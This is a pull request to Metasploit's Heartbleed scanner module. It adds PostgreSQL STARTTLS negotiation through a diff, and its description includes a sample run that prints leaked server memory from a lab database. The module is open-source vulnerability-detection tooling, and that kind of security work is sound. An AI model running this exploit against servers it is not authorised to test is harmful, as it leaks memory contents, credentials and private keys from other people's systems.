### PR TITLE
Add PostgreSQL TLS support to the Heartbleed scanner

### DIFF
--- a/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb
+++ b/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb
@@ -80,7 +80,8 @@ class Metasploit3 < Msf::Auxiliary
     'IMAP'   => :tls_imap,
     'JABBER' => :tls_jabber,
     'POP3'   => :tls_pop3,
-    'FTP'    => :tls_ftp
+    'FTP'    => :tls_ftp,
+    'POSTGRES'   => :tls_postgres
   }
 
   # See the discussion at https://github.com/rapid7/metasploit-framework/pull/3252
@@ -111,7 +112,8 @@ class Metasploit3 < Msf::Auxiliary
         'Sebastiano Di Paola', # Msf module
         'Tom Sellers', # Msf module
         'jjarmoc', #Msf module; keydump, refactoring..
-        'Ben Buchanan' #Msf module
+        'Ben Buchanan', #Msf module
+        'herself' #Msf module
       ],
       'References'     =>
         [
@@ -137,7 +139,7 @@ class Metasploit3 < Msf::Auxiliary
     register_options(
       [
         Opt::RPORT(443),
-        OptEnum.new('TLS_CALLBACK', [true, 'Protocol to use, "None" to use raw TLS sockets', 'None', [ 'None', 'SMTP', 'IMAP', 'JABBER', 'POP3', 'FTP' ]]),
+        OptEnum.new('TLS_CALLBACK', [true, 'Protocol to use, "None" to use raw TLS sockets', 'None', [ 'None', 'SMTP', 'IMAP', 'JABBER', 'POP3', 'FTP', 'POSTGRES' ]]),
         OptEnum.new('TLS_VERSION', [true, 'TLS/SSL version to use', '1.0', ['SSLv3','1.0', '1.1', '1.2']]),
         OptInt.new('MAX_KEYTRIES', [true, 'Max tries to dump key', 10]),
         OptInt.new('STATUS_EVERY', [true, 'How many retries until status', 5]),
@@ -220,6 +222,17 @@ class Metasploit3 < Msf::Auxiliary
     end
     sock.put("a002 STARTTLS\r\n")
     sock.get_once(-1, response_timeout)
+  end
+
+  def tls_postgres
+    # http://www.postgresql.org/docs/9.3/static/protocol-message-formats.html
+    sock.get_once
+    sock.put("\x00\x00\x00\x08\x04\xD2\x16\x2F")
+    res = sock.get_once
+    unless res && res =~ /S/
+      return nil
+    end
+    res
   end
 
   def tls_pop3

--- a/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb
+++ b/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb
@@ -225,9 +225,14 @@ class Metasploit3 < Msf::Auxiliary
   end
 
   def tls_postgres
+    # postgresql TLS - works with all modern pgsql versions - 8.0 - 9.3
     # http://www.postgresql.org/docs/9.3/static/protocol-message-formats.html
     sock.get_once
-    sock.put("\x00\x00\x00\x08\x04\xD2\x16\x2F")
+    # the postgres SSLRequest packet is a int32(8) followed by a int16(1234), 
+    # int16(5679) in network format
+    psql_sslrequest = [8].pack('N')
+    psql_sslrequest << [1234, 5679].pack('n*')
+    sock.put(psql_sslrequest)
     res = sock.get_once
     unless res && res =~ /S/
       return nil


### PR DESCRIPTION
As the title says: add support for detecting vulnerable PostgreSQL installations with SSL enabled. Currently only a handful of tools detect this (Nessus for example doesn't).

A sample run:

```
msf auxiliary(openssl_heartbleed) > show options
Module options (auxiliary/scanner/ssl/openssl_heartbleed):

    Name              Current Setting  Required  Description
    ----              ---------------  --------  -----------
    DUMPFILTER                         no        Pattern to filter leaked memory before storing
    MAX_KEYTRIES      10               yes       Max tries to dump key
    RESPONSE_TIMEOUT  10               yes       Number of seconds to wait for a server response
    RHOSTS            pgsql2           yes       The target address range or CIDR identifier
    RPORT             5432             yes       The target port
    STATUS_EVERY      5                yes       How many retries until status
    THREADS           1                yes       The number of concurrent threads
    TLS_CALLBACK      POSTGRES         yes       Protocol to use, "None" to use raw TLS sockets (accepted: None, SMTP, IMAP, JABBER, POP3, FTP, POSTGRES)
    TLS_VERSION       1.0              yes       TLS/SSL version to use (accepted: SSLv3, 1.0, 1.1, 1.2)

msf auxiliary(openssl_heartbleed) > run
[*] 192.168.0.241:5432 - Trying to start SSL via POSTGRES
[*] 192.168.0.241:5432 - Sending Client Hello...
[*] 192.168.0.241:5432 - Sending Heartbeat...
[*] 192.168.0.241:5432 - Heartbeat response, 65551 bytes
[+] 192.168.0.241:5432 - Heartbeat response with leak
[*] 192.168.0.241:5432 - Printable info leaked: STC`]C"INDw}F^f"!98532ED/A!.98..P6%vt 11980_fsmUL8. 11876_fsm+ 16402_fsmhFcU 11885_fsmeQM+ 11817r 12050fsm5E$n4*e 11805_fsmF 11980_vmNE+5E 11988wMnI B{ 11883dxbF 16402_vm 11838fsmwMn 11821_fsm3*dx 12030_fsmb 11807y*7 12045:u`48(# 12011C?8hXZ3 16407fsmz9b 12037vmly 12016vmWf:u`4 11920_fsmC?8h 12030_vmA.qx 11892_vmHll 11843 -jGWf 11897_fsm,#Q 11897_vm$ C'A 120320WK!t H 11973Sv" -j 12040_fsm#Q!H, 11829fsmV5$`F$ 11889ernal.%g0WK 118991183&n 11895_fsm87 Sv(pg_internal.init84(' 118341203)CCtV5 118751189*)_T 11868_fsm87+D~J 118971197,/( 118871199-#^ 118491184.n( 12030vm187/ #p 1189111920NQ&% 1187111971:$ 11973_vm1852wPb 11994vm1923b% 1184512044d. 1187911825TdqDr> 11920_vm1826Cq 1197911857- 11858118685+h8 1192611809:Ad 120441202:&H[=?z 118201205;RK 118211186< 118551204=OS 11868fsm86>#@\ 118051192?2Co2 12029fsm99@\ 12055_fsm89A0. 118601197BzF 12045_fsm81Cry  11860_fsm05DV-! 11924fsm88EM.o! 119961190F.g62! 11895_vm183GV9sN" 11973_fsm_VHH,# 118191201Ic|7# 12055_vm191JH%$ 11888SION7KvpfJ$ 119001185L`v$ 11832_vm182Mpx$ PG_VERSION9N6% 12010fsm94O~b^& 119181180Pu& 11876_vm182QF_& 11856_fsm93R%"p' 11824fsm85StND( 119991193TY^( 119401191UxPo^{( 11803_fsm98V_R( 118271203W8) 11937vm202X,-a63t) 118561186Yhn* 119331190Z_8* 11914_vm197[z}tB* 11980vm199\R* 120351186]BXw+ 12024_vm202^Q{+ 11860_vm190__p!, 11904vm202`Mu- 11975vm189a l;x. 119921205b})/ 11864_vm02c/ 12020_vm197d\O0 119061183e0 12020_fsm91f0 11895vm184gm:0 120591182h'1 120241192i:31 11977_vm187jp2 118351198kIM7a33 119191204l5^64 118471199m696 118251190n"v7 119201184o}CV67 11874..2p=9 11982$NqgOxw9 120401186ra8; 119901200sMtr; 11901fsm06t$N= 11848fsm97u.:= 11864fsm98v*<6U= 12003fsm81w0*N= 12062vm180xW[M? 11977_fsm98y>!st? 11988_fsm99zF4|? 118121185{? 11808enode.|9i? 11988_vm185}f@ 11998enode.~6P%i@A 118521185NA 120391192zW.B(pg_filenode.map184]c`B 11854fsm80c)ot_C 11929_fsm05]%\NoC 118621180@OD 11843_fsm87ED 11809_vm02JvD 120541188TE 11805_vm02$GF 118761192Lo[LG 12022fsm00<-G 11881_fsm82$bH 12026fsm0058H 119231184B`3.I 120041188"8AI 11825_fsm910%iI 12006vm199@BI 1184011874,J 11881vm202mBfv"K 1191411923K 119911198.|%{K 11872_vm201AL 120201204 *L 119281197P{|L 119831185(DlL 120131193mSL 120421205X~<UM 119771185WKoN 118501180$N 11938vm191\X"O 120551205!oK)P 11859vm206a`P 118091200bUZQ 11916vm200@Q4Q 12050_vm1880Q 12064vm188;S 120091190(CS 120001184Htn!T 11885_vm938Q7T 118851198x]a/xT 11909fsm38_yT 118411190S(V 16402fsm90Ncc#.V 119361187@DV 11984@_fsm99=;X 1190211934Y 11908vm193w_Z 118721204Ir[ 11992_fsm04NbH\ 119321205f+6X\ 119311193iX\ 120474I|\ 12040_vml|+7] 12052tLA] 11935@c] 12027c_ 11907vm&pA+` 11863:NQ` 11832ga 11922fsm'}b 11843_vmObb 11912fsm!=d 11880fsm8e 11872_fsmEWu1e 11914_fsmV'f 12035_fsmlf 12024_fsmih 11927:+mh 11892Q<h 12057fsm0h 11823vmOk}Ch 11884i 11910dH{Qi 11809_fsmb4?lYi 12035_vmJg~i 11984>1Ei 11986vm.qli 16395vm'o&j 11856_vm^w|bj 11830fsmsYk 11868_vmiul 11821_vmEqkl 11929vm%|l 11864_fsm%xl 11976E:(l 12060!au`m 12045DXNI 6k3l8E||[-#C[U]84|WCl3!,*<)@|r)zPF=f]A|K"&^U/x?[w"V^(WJYQ4lJ7V,:3E}8l^LNJ81}"?gG2y|<|mCS6}M6nj4,>1apTCyK^!k%M<c<\pG){@U)qDcyQ`6iH5 1xZpK9hDG(Ot~'X4TkWV)_K,~-b[Y|{"+w{RDgS8wL*Rw*q`&GIPr uVa4C+<kY3,LdR$p0d[LF_c;uUaf^,=hpuIqN~*.prpn>5Q$2A[9|#g:S8>iC]Bx1831R~y 12023Tz 12015vmtCz 11870fsm +oN| 11913F| 11803vmz6[t| 11941fsm5Ds| 11938_vmP"6} 11938_fsm1E} 11995fsmbBe} 11881_vmx[a 11811=L 11878T5> 11892_fsm 11832_fsm@SCm|<|y2Gg?"}18JNL^l8}E3:,V7Jl4QYJW(^V"w[?qwMwMpMx:D{o*c(K)<G<7Gx/@GpmNevnmh[vH/f_LVjE'V<2"ExMxM(=:awMbO  #q+5u=|_v]/2{=1mz$!~lWK d)o{]7q)j-;]Iq~!'6AP&#9{ FW>Ht~iO#I" 2mX3)mn5W&d>` #\E\(Y$[ U _3C$z<sI=hN&3c"c*'$xg\MQ2Rm6MU!o15bAxK@>i&~7qqE6KBB]>p[]y1'F>1$mA:!`O!OEA}i%tnxxMxxM TynNrE4.=4'};}QhNb(!RG{D1BoWs<'FJU/kTX7!,Wn@I]."XoFs QyMYO1pO OPsh#j 50-"6RZDuFlCpK7Vmx)/$2,}1U_E=LH`t#kLE21wMwM00OO0xu>9xg;/ET7;y)1"MHWf;XI^c{,hmot1XI,QvKjM`fCQr8Z`,-KE9l(rv3daOV&9 .6$3qR}0hU^<njFTCL2H{MH{M YO \Ov.fF pO#:'ckQ?gfL67#r[eVWd#HGQ1sp/G@:?0+xoWqpO A`O  #q1}M}M O O@R0#'m+]t67f^(.m1f["^mhxC%pi 0 1OpO! OO OxwM0zRP'6TO0GVI7hl^lt&;?qzByG/]yieJ@nY+R}4E/# ]fT~NmSzIO/q>2VJm$):OV'K*nnb_x/hpqs5Ku(=:f$L_Q^nLe=i3^`_[XZ~hT&EYI{{~0IT/u7wf1x!i;A$,ta'6pVZxVW&Y3,3~4j>G~@O=l01I|=c~A+wNG,N|2>f)]U(:N:#mX(2cv%\=\8#b1yMyM0!1@"
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
